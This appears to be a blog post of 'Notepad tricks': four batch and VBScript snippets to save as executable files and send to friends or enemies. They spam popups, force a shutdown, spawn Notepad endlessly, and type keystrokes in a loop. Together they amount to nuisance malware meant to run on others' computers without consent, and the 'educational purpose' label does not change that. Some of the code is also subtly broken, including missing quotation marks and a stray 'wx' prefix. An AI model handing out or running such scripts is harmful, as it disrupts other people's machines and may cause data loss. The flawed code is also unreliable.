Saturday, June 1

# # Awesome Notepad Tricks # #

1. Cycle a message in your friend's computer:

open notepad and Type :

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save it as Anything.BAT and send it to ur frenz or enemy.

 2. Convey your friend a lil' message and shut down his / her computer:

Type :

wx@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s

Save it as Anything.BAT in All Files and send it.

3.Open Notepad continually in your friend's computer:

Type :
@ECHO off
:top
START %SystemRoot%\system32
notepad.exe
GOTO top

Save it as Anything.BAT and send it. 

4.Hack your friend's keyboard and make him type You are a fool simultaneously

Type :
Set wshShell = wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys You are a fool.
loop

Save it as Anything.VBS and send it.


Warning : For Educational Purpose Only

No comments:

Post a Comment